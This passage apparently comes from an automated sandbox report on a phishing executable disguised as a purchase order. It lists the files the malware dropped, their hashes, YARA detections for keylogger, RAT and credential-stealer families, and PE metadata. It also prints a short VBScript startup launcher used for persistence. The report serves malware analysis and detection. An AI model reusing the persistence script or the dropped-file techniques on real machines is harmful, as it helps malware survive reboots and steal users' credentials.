m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ

C:\Users\user\AppData\Local\Temp\server01.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	5.678429468734117
Encrypted:	false
SSDEEP:	1536:kwa4JHA8xaqWUiRzGJVeygdqcyxCVf1UMR7pfpPYlM:M4JgqWUi5GJVey2qcyi+MDfpPr
MD5:	0CDBE0CD3CB5C2F0B2CB17E4417D43F5
SHA1:	E3AA6201E5A42ADFA1BFB4506D6852DE22E07494
SHA-256:	7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31
SHA-512:	3D125DAE61F960D7E32C0EB4D301EFA3322AB8201E83FB7343EF4C28ED6B788B1906E09106F8A3052630DD880FD278623F7887ED472D7C2552DB96CB3F1C8986
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v..........^.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...du... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B................@.......H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\uncolorable

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.924466320417484
Encrypted:	false
SSDEEP:	6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
MD5:	51E866564694747435D2C707254F6500
SHA1:	7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
SHA-256:	41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
SHA-512:	987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
Malicious:	true
Reputation:	unknown
Preview:	...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ

C:\Users\user\AppData\Roaming\90fdfad63d8f4c72.bin

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.985026900285246
Encrypted:	false
SSDEEP:	384:q4ON/EqEYn5S3rXbS0rr+03+QY/iZJdbfwof4:MOqEY5ITrrXnEEdbfwof4
MD5:	2B59B03FBDD69A311F16C97480B6248B
SHA1:	B52127E02F4A4EA3E8C4D03F7D18739067D69E0A
SHA-256:	DAB886153BDD1EEA666442433C379C4C36F615E2D6178E251D8F20D65E400E45
SHA-512:	49058694DAA45579B5D7678817FFFCCFCAB330E75E6FEA26AD336DA75C411C0048A6191E4E7D600F3FC36AEDDA2B3202F55C657C7DC546EF9E761BA63FE0BF54
Malicious:	true
Reputation:	unknown
Preview:	.B.v..6Q(..!.r..E....I.0J....8]$w.U.Dc..k.'......I......<.x..-..<..~aaMsG......Mc...2$.H..E........O.M....?,...?....<...Jg..;D.9..._(.....{.q.f'......0.vd).e..=z...:..H.zT...[.u.F...`..._........;S.{.w..'A..oX..^By.o......(............K..u.......x..c...nVM...........F.I.-..S..}....+..+.....r....]..xLT...AS.S@6.\b..8r.r.f.......}[.....y..........`.WC@b.xM^.."...(l9..o.i_O.4KO.N.........p!1)...A@.........4........do...G<.uT.._...QGN..p..p.'N.x.).3.&..B.).@..c..,...'B8#.0....\.#XE.S.8.c....l.eZk.g.....O.k}0x%T..v..F....j...........<.1R..6.9......hff..<.y.....D.d;<...d9....<mU......Bs8.e"8.p....Pn./.y...P.F...8.J...s...r.....]@..."..jsI^...2.`...?`..l.Og.F.k...d/..^.=.uG......\|.y.\|(AX....J...2{]..p.i.m....bH< ....'..4.B...w..r..U.....".T..T\|....l_.'V.2e...C8.5.JQ{.r..mc.m..O3.......jJ.p.1...j.@iy..../..we...<.t..\|.1...n..Z...q..E....,..[...aY...:.....L...^........T.t}.:NS.{....WjI..v.*.Ge..aq..UVq...#.e[,/..qV..C.M......3

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665670656
Entropy (8bit):	7.9999993098427975
Encrypted:	true
SSDEEP:
MD5:	8EBEFAB8EF46B9960EDB099737B0E1ED
SHA1:	325A0F5B9A768BC3E936B36E17A82B51FE14EB12
SHA-256:	528D12368F9811117E31EFB317FCCE2EBA59ADAAA4D20D2F0D695BAEDE3B1762
SHA-512:	B10F5AAD894FB11AF9C70E06A738B9E73B4DCC4080E759ADC4A226B01A6DCFDE5486F881CDA0D0A01A8AEEB07FC58B3BA3333256A203CD646F1346F3C792744D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs

Download File

Process:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.4099935178663547
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1qK/1JYnriIM8lfQVn:DsO+vNlzQ1rJOmA2n
MD5:	4EBDB199F5AFBAAC3EE261C08C587144
SHA1:	59CA0D62EE60B4307BA74526438505E667E536DE
SHA-256:	4E579F8911E995D8C6C381F949F6B1CBDB7EEC5B379C944EF00899665958B64F
SHA-512:	2DB8C910A888B070BFECCEA1F3D354D49DE246617708DFDE408227FFD28F1AAD7902A3BB06E1527729D00A16642203EB34EE6DBF4E6304C5FE31C40E92FDEB51
Malicious:	true
Reputation:	unknown
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.u.n.l.o.p.\.G.r.i.n.n.e.l.l.i.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Nov 22 16:55:08 2024, mtime=Fri Nov 22 16:55:08 2024, atime=Fri Nov 22 16:55:08 2024, length=70656, window=
Category:	dropped
Size (bytes):	1778
Entropy (8bit):	3.484940049908394
Encrypted:	false
SSDEEP:	24:8tvfB8LmZ3Y8IemnMeQAPoFG9KmR+O4ZvPqRupJm:8dOD8IeGwcR+ZXqRU
MD5:	71CEFB591F096460A152753CB4529830
SHA1:	A02FD96D5C16E29C0CBAFB4D1B5CC01E2596E33E
SHA-256:	742C05F612CC382ACCEAC57CBCBFAC8E2520DBF801DB81BD632F93AFCFBE4276
SHA-512:	727B230F01677E6995434D946AA53BE642F0110F95070F4FB0EC9A4B229DD033E799B64C8CDA98A17CCC79E08E35B1808F0CA7F74E5A1011C72E22F1BB9B9760
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ....JL..=...JL..=...JL..=............................:..DG..Yr?.D..U..k0.&...&...... M.....P...=...qS..=......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlvY.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....vY....Roaming.@......DWSlvY......C.........................R.o.a.m.i.n.g.....T.1.....vY...ACCApi..>......vY.vY...............................A.C.C.A.p.i.....b.2.....vY. .apihost.exe.H......vY.vY...............................a.p.i.h.o.s.t...e.x.e.......a...............-.......`....................C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.253761982049738
Encrypted:	false
SSDEEP:	24576:DQW4qoNUgslKNX0Ip0MgHCpoMBOufsqjnhMgeiCl7G0nehbGZpbD:DQW9BKNX0IPgiKMBOuDDmg27RnWGj
MD5:	C694BB2A60BDA8FD88F36DC094FF6DB0
SHA1:	F37DD6A789E26F55D1719439BD4B75B83E198266
SHA-256:	A78C10A408F498A153C4AD791C69D9F752499CDC3AC1538BC4BE850CBFDC7A5A
SHA-512:	7CCBD89DC2C3591FA227A6A238C610CBBC536544BE106994BA87E218B9761E0FB6778B3A30C44C35FA9E418C2133036FF9D1C48DB9F9437174303DC0B59D564A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................nY.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1224192
Entropy (8bit):	5.1635699795775825
Encrypted:	false
SSDEEP:	24576:02G7AbHjkcsqjnhMgeiCl7G0nehbGZpbD:02G7AbHjhDmg27RnWGj
MD5:	9FDC7FC3E3CBA0CDE67F133391783A01
SHA1:	435AF62C48D9AF690A03F109599A05CF400B757E
SHA-256:	63329ACB43E81687252E0CB5D975CAA9C3F943F819DE3754E19979AEB5874539
SHA-512:	38BA44570DDD95E81AAC9889769141A9308872A6746E3C0AC8880C26EE4EA3F033A2AFF702594EA03A1D61027B1B60F0A7E3BA654E53E963FD1F87BBA7004C47
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................K..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.1633270110621385
Encrypted:	false
SSDEEP:	12288:qEP3R6FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J6FsqjnhMgeiCl7G0nehbGZpbD
MD5:	DA0B96A9E5E0F99A5EF268C07A1A1025
SHA1:	439F064C4AD8C17B0D06ACF25F86B7F82A3122C4
SHA-256:	EBB24977B8CE83B9E84DE29F40C03A46AD68B125D8E7E390BA411DFECD5D1C4B
SHA-512:	CEB66F6E131D2618C094D7F11E1B8F9E09941561DEA8F5206AB0020C7DF42CF79D1AFBE8DDB2DDF03140815ABA9ADC64F6012A7E7D0D5276A130B3F0306FE16A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.....................................J.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.bin

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984329970736749
Encrypted:	false
SSDEEP:	384:xEOxwZKpX29Dmmmgbh+uX0I8RsRjS24kX1znI:HJd2rh+qVeQ+lk9I
MD5:	6E6C3EDDFAB710148F52A1C8CD379F76
SHA1:	850B750AE69E1A799904FCD678431415A343D455
SHA-256:	2F74342265B4915D003FB2965E49EA17BF5908901773ADF0F18815C3A5B1232D
SHA-512:	A89D5174C44C21E7962B134B2C0E04CFA8700B8A59F0BB72B85F6513D5EF23C30DCECF9268D0D49532EE140332215D7A3C9AEBF09A64BD68E27B193F5E9AD244
Malicious:	true
Reputation:	unknown
Preview:	"%.1...u.;...er..s@.Y(9....2._.......<......<\|.Eyi..+...h.q\..!...............\.bj4lz .;...P.i.(.......Bl...1.r.....H....9.~u..,l:..v..k......r.....A..6B+..M..N....F......p....B.K.fY.z.Ms....Q......Q.q2Lv......5...q....D......g...X.l..c..Q..P$...@\|...K...~..0].E.k.. . .]..u....G[s...3V.3q/....$Av.........(b...I.....(q.J.I...!..mG8. ....W.Yf.Y<.K$w..Sr1n4.F...f0qcN#F.....~..6..+..[.u1..,.\.;.....Z...d.....>..<..P4.6.4.@..,..KN..[.g.C...l0...n..5.........x2(..@.IV...{.*.=..I@,..J...".......T.....S..=.j....!xZ.t.Ci.....j9q.7p......(..%.5^..8.#.pm.N..`....0......;.....\|,...}.E..../.c..5......%T.._hZ..F..~.3..\..\C.....).....9<h.Int.h.,...t$}OG...F....EQ(SkJ....u:/I..Dk.-...K..J..........o.nH.[[?..U.nb4j{..i...kCS.3B?8...H.....bN.Ng.......%...;..>...Rxx.(.<.7..I.."D"..q....Em.o}..X.2.g2..A.iK..........wl......P..F.rj3{..S.....C_5...R..'...4-..sU..uT_._o....?"../.b..pU.P...C..H...v..K1C.;"..>OC..\|S8.<...G8.e.........O.w......W..M..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.517430962460623
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO #09465610_GQ 003745_SO-242000846.exe
File size:	1'851'904 bytes
MD5:	33ffa6b9a3022156b4592e17f1a9a074
SHA1:	8ec7beb8a9bb5c5fdf769698ea2abf553e6a655d
SHA256:	b336830d627101633db934f8d48606639c70d133a5985026bc250c035e887faf
SHA512:	046bb90347baf7fb63536eb0b527e8bf881db5220617ad4e679b4123fc5d81363f2ed98ccc966c19197db68261783c6c9d332ce9ec45645065d80935886f25be
SSDEEP:	24576:Otb20pfaCqT5TBWgNQ7aDEgJ+y+wn4DocDtE6AE5sqjnhMgeiCl7G0nehbGZpbD:7Yg5tQ7aDEPy+wn47DK5qDmg27RnWGj
TLSH:	D885F02373DD8365C7B26273BA65B741BE7B7C2506B0F86B2FD4093DA920121521EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x674064AB [Fri Nov 22 11:02:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F12E068C70Fh
jmp 00007F12E067F724h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F12E067F8AAh
cmp edi, eax
jc 00007F12E067FC0Eh
bt dword ptr [004C0158h], 01h
jnc 00007F12E067F8A9h
rep movsb
jmp 00007F12E067FBBCh
cmp ecx, 00000080h
jc 00007F12E067FA74h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F12E067F8B0h
bt dword ptr [004BA370h], 01h
jc 00007F12E067FD80h
bt dword ptr [004C0158h], 00000000h
jnc 00007F12E067FA4Dh
test edi, 00000003h
jne 00007F12E067FA5Eh
test esi, 00000003h
jne 00007F12E067FA3Dh
bt edi, 02h
jnc 00007F12E067F8AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F12E067F8B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F12E067F905h
bt esi, 03h
jnc 00007F12E067F958h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x6d748	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	308455cadbd77579290bc04149bdd52f	False	0.5699516535874439	data	6.680433311078666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x6d748	0x6d800	d3d7422cdf7b9863b9fa7c340891d73e	False	0.9418499393550228	data	7.9247916892982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x132000	0x99000	0x98000	fae575eb90698f435513a57dab252297	False	0.9550154836554277	data	7.8713996381848785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xc9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xca148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc410	0x64e1d	data			1.000329128076803
RT_GROUP_ICON	0x131230	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1312a8	0x14	data	English	Great Britain	1.15
RT_VERSION	0x1312bc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x131398	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
